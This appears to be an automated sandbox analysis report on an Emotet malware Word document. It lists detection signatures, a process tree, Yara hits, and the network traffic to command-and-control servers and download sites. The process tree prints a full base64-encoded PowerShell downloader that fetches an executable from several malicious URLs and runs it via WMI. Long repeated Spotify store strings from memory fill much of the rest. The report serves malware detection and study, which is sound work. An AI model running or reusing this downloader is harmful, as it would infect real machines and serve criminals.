Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Exploit.Siggen2.12119.17670.7154

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen2.12119.17670.7154 (renamed file extension from 7154 to doc)
Analysis ID:255756
MD5:1e522cb3efd6b827ac682b262c9e26a3
SHA1:d444e2e6ecf2f973e82c016dbbc6601d1b6c547c
SHA256:ea1d07ae55467195b610358c91f9d4cb4f280d055e9a86158339ca3bdba8ca15

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected Emotet Downloader
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with many randomly named variables
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
PowerShell case anomaly found
Very long command line found
AV process strings found (often used to terminate AV products)
Allocates a big amount of memory (probably used for heap spraying)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6724 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • svchost.exe (PID: 6904 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • powershell.exe (PID: 6980 cmdline: powersheLL -e JABSAFcAVQBIAE8AYQBxAHQAPQAnAFoAVwBSAEcAVwBiAHQAegAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAFIAaQB0AGAAeQBgAFAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAQgBJAFIAUwBCAHEAeQBnACAAPQAgACcANAA2ADMAJwA7ACQARgBKAEkATgBFAGoAaQBkAD0AJwBUAEYARwBEAEIAbAB2AGMAJwA7ACQASgBCAFIAVQBGAGUAcwBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABCAEkAUgBTAEIAcQB5AGcAKwAnAC4AZQB4AGUAJwA7ACQAQwBNAFEARABMAG0AcwBzAD0AJwBWAE0AUABaAEMAZQBjAGIAJwA7ACQAWgBaAFYASgBBAHYAagBuAD0AJgAoACcAbgBlAHcALQAnACsAJwBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABuAEUAVAAuAHcAZQBiAGMAbABpAGUATgBUADsAJABaAE8ATgBGAFQAcgBqAGwAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBsAGkAYgByAGUAcgBvAC4AeAB5AHoALwBTAGMAcgBpAHAAdABzAC8AMwB5AF8AbQAwAGMAYgBlAF8AbABwAGcAbwBqADcAegAvACoAaAB0AHQAcABzADoALwAvAHMAYwBvAGUAbgB1AGcAYQBuAGQAYQAuAG8AcgBnAC8AdwBwAC0AYQBkAG0AaQBuAC8AawBfAGYAaABzAHYAYwBfAHcAbgBpADIAegB4AHoAcgBjAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBkAHUAbgBuAHIAaQB0AGUAcABsAHUAbQBiAGkAbgBnAC4AYwBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AMQAyAHgAXwBqAGEAYQBxAF8AbwAzAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbgBhAGoAYwBvAHMAbQBlAHQAaQBjAHMALgBjAG8AbQAvAGkAbQBnAC8AaAB2AGcAbAB2AF8AaABhAHkAXwAzADUAcwBhAGMAbwBkAGcALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBvAHgAYQBoAGEAdQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBkADgAdABlAGIAXwBuADAAdgAwAGgAXwBkAG0AMAB1AHkAbwBrAC8AJwAuACIAcwBQAGAAbABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABKAEkAUABYAEcAeAB2AGEAPQAnAFMAVABQAFYAQQB6AGwAdwAnADsAZgBvAHIAZQBhAGMAaAAoACQATQBIAFgAQwBIAHAAbgB5ACAAaQBuACAAJABaAE8ATgBGAFQAcgBqAGwAKQB7AHQAcgB5AHsAJABaAFoAVgBKAEEAdgBqAG4ALgAiAGQAbwBgAHcATgBMAGAATwBBAEQARgBpAGAAbABlACIAKAAkAE0ASABYAEMASABwAG4AeQAsACAAJABKAEIAUgBVAEYAZQBzAG8AKQA7ACQARwBCAFgAVgBVAG0AdABtAD0AJwBGAFUARABDAEIAYQBxAG0AJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABKAEIAUgBVAEYAZQBzAG8AKQAuACIATABFAGAATgBHAFQASAAiACAALQBnAGUAIAAzADQAOAA1ADAAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAYABSAGAARQBhAHQAZQAiACgAJABKAEIAUgBVAEYAZQBzAG8AKQA7ACQARgBGAFQASQBMAGEAYQB5AD0AJwBaAEwAUQBPAEYAZgB2AHoAJwA7AGIAcgBlAGEAawA7ACQATgBPAEMARABVAGcAcABnAD0AJwBRAFIAUABGAE8AZwBzAHIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATQBTAE0AVgBVAG4AdABtAD0AJwBQAEcAWABXAEYAYQBzAHoAJwA= MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 240 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6332 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6340 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6268 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 3492 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6096 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5280 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5928 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5784 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6528 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20200802\PowerShell_transcript.767316.L3ypsoUw.20200802010517.txtPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x23:$s1: PowerShell
  • 0xfd:$s1: powersheLL
  • 0x107f:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0x107f:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0x107f:$sn3: PowerShell
  • 0xff:$a1: wersheLL -e
C:\Users\user\Documents\20200802\PowerShell_transcript.767316.L3ypsoUw.20200802010517.txtJoeSecurity_EmotetDownloaderYara detected Emotet DownloaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000002.525602503.0000000002281000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000007.00000002.525557735.0000000002270000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000006.00000002.279192732.00000000021E1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000006.00000002.278901270.0000000000730000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results
            Source: C:\Windows\SysWOW64\apprepapi\Windows.ApplicationModel.Background.TimeBroker.exeCode function: 7_2_02281D9C CryptDecodeObjectEx,7_2_02281D9C
            Source: C:\Users\user\463.exeCode function: 6_2_0042645E FindFirstFileA,FindClose,6_2_0042645E
            Source: C:\Users\user\463.exeCode function: 6_2_00401770 FindFirstFileA,FindClose,6_2_00401770
            Source: C:\Users\user\463.exeCode function: 6_2_004018B0 FindFirstFileA,FindNextFileA,FindClose,6_2_004018B0
            Source: C:\Users\user\463.exeCode function: 6_2_00425B9E __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,6_2_00425B9E
            Source: C:\Users\user\463.exeCode function: 6_2_00401BB0 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,6_2_00401BB0
            Source: C:\Users\user\463.exeCode function: 6_2_021E28BC FindNextFileW,FindFirstFileW,FindClose,6_2_021E28BC
            Source: C:\Windows\SysWOW64\apprepapi\Windows.ApplicationModel.Background.TimeBroker.exeCode function: 7_2_0042645E FindFirstFileA,FindClose,7_2_0042645E
            Source: C:\Windows\SysWOW64\apprepapi\Windows.ApplicationModel.Background.TimeBroker.exeCode function: 7_2_00401770 FindFirstFileA,FindClose,7_2_00401770
            Source: C:\Windows\SysWOW64\apprepapi\Windows.ApplicationModel.Background.TimeBroker.exeCode function: 7_2_004018B0 FindFirstFileA,FindNextFileA,FindClose,7_2_004018B0
            Source: C:\Windows\SysWOW64\apprepapi\Windows.ApplicationModel.Background.TimeBroker.exeCode function: 7_2_00425B9E __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,7_2_00425B9E
            Source: C:\Windows\SysWOW64\apprepapi\Windows.ApplicationModel.Background.TimeBroker.exeCode function: 7_2_00401BB0 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,7_2_00401BB0
            Source: C:\Windows\SysWOW64\apprepapi\Windows.ApplicationModel.Background.TimeBroker.exeCode function: 7_2_022828BC FindNextFileW,FindFirstFileW,FindClose,7_2_022828BC
            Source: winword.exeMemory has grown: Private usage: 0MB later: 65MB
            Source: global trafficDNS query: name: www.librero.xyz
            Source: global trafficTCP traffic: 192.168.2.3:49725 -> 138.128.181.122:443
            Source: global trafficTCP traffic: 192.168.2.3:49724 -> 65.99.252.93:80

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.3:49728 -> 142.105.151.124:443
            Source: global trafficHTTP traffic detected: GET /Scripts/3y_m0cbe_lpgoj7z/ HTTP/1.1Host: www.librero.xyzConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: www.librero.xyz
            Source: global trafficHTTP traffic detected: POST /bYtJY/mGgMu83T0/ HTTP/1.1Referer: http://142.105.151.124/bYtJY/mGgMu83T0/Content-Type: multipart/form-data; boundary=---------------------------010163079471474User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 142.105.151.124:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 142.105.151.124
            Source: unknownTCP traffic detected without corresponding DNS query: 142.105.151.124
            Source: unknownTCP traffic detected without corresponding DNS query: 142.105.151.124
            Source: unknownTCP traffic detected without corresponding DNS query: 142.105.151.124
            Source: unknownTCP traffic detected without corresponding DNS query: 142.105.151.124
            Source: unknownTCP traffic detected without corresponding DNS query: 142.105.151.124
            Source: global trafficHTTP traffic detected: GET /Scripts/3y_m0cbe_lpgoj7z/ HTTP/1.1Host: www.librero.xyzConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: www.librero.xyz
            Source: svchost.exe, 0000001C.00000003.465633622.000001E301FDB000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
            Source: svchost.exe, 0000001C.00000003.465633622.000001E301FDB000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
            Source: svchost.exe, 0000001C.00000003.465633622.000001E301FDB000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-07-27T07:14:35.6749414Z||.||121f780f-ffc5-478c-bf53-6b53ed02cb1e||1152921505690835751||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2020-07-27T07:13:24.2771771Z","LocalizedProperties":[{"SkuDescript
            Source: svchost.exe, 0000001C.00000003.465633622.000001E301FDB000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-07-27T07:14:35.6749414Z||.||121f780f-ffc5-478c-bf53-6b53ed02cb1e||1152921505690835751||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2020-07-27T07:13:24.2771771Z","LocalizedProperties":[{"SkuDescript
            Source: svchost.exe, 0000001C.00000003.465702312.000001E301FCB000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ] equals www.facebook.com (Facebook)
            Source: svchost.exe, 0000001C.00000003.465702312.000001E301FCB000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ] equals www.twitter.com (Twitter)
            Source: unknownDNS traffic detected: queries for: www.librero.xyz
            Source: unknownHTTP traffic detected: POST /bYtJY/mGgMu83T0/ HTTP/1.1Referer: http://142.105.151.124/bYtJY/mGgMu83T0/Content-Type: multipart/form-data; boundary=---------------------------010163079471474User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 142.105.151.124:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
            Source: Windows.ApplicationModel.Background.TimeBroker.exe, 00000007.00000002.526270542.00000000026B2000.00000004.00000001.sdmpString found in binary or memory: http://142.105.151.124/bYtJY/mGgMu83T0/
            Source: Windows.ApplicationModel.Background.TimeBroker.exe, 00000007.00000002.526270542.00000000026B2000.00000004.00000001.sdmpString found in binary or memory: http://142.105.151.124:443/bYtJY/mGgMu83T0/
            Source: Windows.ApplicationModel.Background.TimeBroker.exe, 00000007.00000002.526270542.00000000026B2000.00000004.00000001.sdmpString found in binary or memory: http://142.105.151.124:443/bYtJY/mGgMu83T0/c
            Source: svchost.exe, 00000001.00000002.527538433.0000019ABF80E000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft.
            Source: svchost.exe, 00000001.00000002.527538433.0000019ABF80E000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.480281699.000001E301671000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: svchost.exe, 00000001.00000002.527538433.0000019ABF80E000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.480281699.000001E301671000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: svchost.exe, 00000001.00000002.527538433.0000019ABF80E000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.480265286.000001E301657000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
            Source: svchost.exe, 00000001.00000002.527896283.0000019ABFA30000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
            Source: svchost.exe, 00000009.00000002.304026739.0000021A4FC13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
            Source: PowerShell_transcript.767316.L3ypsoUw.20200802010517.txt.2.drString found in binary or memory: http://www.librero.xyz/Scripts/3y_m0cbe_lpgoj7z/
